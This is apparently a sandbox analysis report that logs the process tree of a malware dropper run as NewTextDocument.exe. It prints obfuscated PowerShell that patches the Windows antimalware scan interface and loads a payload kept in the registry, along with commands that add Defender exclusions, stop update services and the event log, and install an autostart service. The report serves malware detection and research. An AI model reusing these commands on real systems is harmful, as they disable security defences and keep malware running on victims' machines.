$_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'icro'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'eNat'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'h'+[Char](111)+'ds');$cjamcBWbUeiYFp=$mROtnFNlpOpQK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lTtkaEbeIUFkELaNQrp=YzbKDlkEvoiP @([String])([IntPtr]);$tpTTDPrIyYPNIvxmSXsCEV=YzbKDlkEvoiP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NJCFRmWYWIl=$mROtnFNlpOpQK.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$GxoauuZqFwPXeM=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$mpuImyzxFAXRXzNMp=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FjxjzMf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxoauuZqFwPXeM,$lTtkaEbeIUFkELaNQrp).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+'l'+'');$zHBcEpfJFRcJRExQE=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$FjxjzMf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$MHjpcMCHxx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,4,[ref]$MHjpcMCHxx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zHBcEpfJFRcJRExQE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,0x20,[ref]$MHjpcMCHxx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).Ent
ryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qwLHkZXFzmKZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ympiCVUcQUIwPw,[Parameter(Position=1)][Type]$dqXuQKUBhK)$fhOoLHkPBqO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+'y'+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fhOoLHkPBqO.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ympiCVUcQUIwPw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fhOoLHkPBqO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char]
(111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$dqXuQKUBhK,$ympiCVUcQUIwPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'im'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $fhOoLHkPBqO.CreateType();}$aYDMhNBIxCkso=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+'Meth'+'o'+'d'+[Char](115)+'');$ERyGLMwEoOOMVT=$aYDMhNBIxCkso.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JeoiWKxHehfHbSHWDxh=qwLHkZXFzmKZ @([String])([IntPtr]);$cvINplqKeNJvCwMsndbxTK=qwLHkZXFzmKZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$baolUOiMTkB=$aYDMhNBIxCkso.GetMethod(''+'G'+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'and'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.d'+'l'+'l')));$rEXqfKPFSSNJzN=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+'y'+'A')));$rZORpBmFhgNwfTkSc=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+'a'+'lPr'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$KFTLLdl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rEXqfKPFSSNJzN,$JeoiWKxHehfHbSHWDxh).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+[Char](46)+'dl'+'l'+'');$WxBGdKhFwpzftvLjL=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$KFTLLdl,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+'r')));$SMIhvkSHmK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,4,[ref]$SMIhvkSHmK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WxBGdKhFwpzftvLjL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,0x20,[ref]$SMIhvkSHmK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:6084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5080
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1456
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2568
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2272
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2776
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2876
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3444
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"2⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5684 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2616
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5156
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4020
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6044
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:2480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KPNEMLWP"4⤵
- Launches sc.exe
PID:4984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KPNEMLWP" binpath= "C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe" start= "auto"4⤵
- Launches sc.exe
PID:1952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:5340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KPNEMLWP"4⤵
- Launches sc.exe
PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"4⤵
- Executes dropped EXE
PID:4632
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:6012 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3868
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:444
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5312
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3468
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1884
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3496
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:6120
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4804
-
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exeC:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1628 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5508
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5668
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4360
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4916
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4180
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4988
Network
MITRE ATT&CK Enterprise v16
Downloads
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize 4KB
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB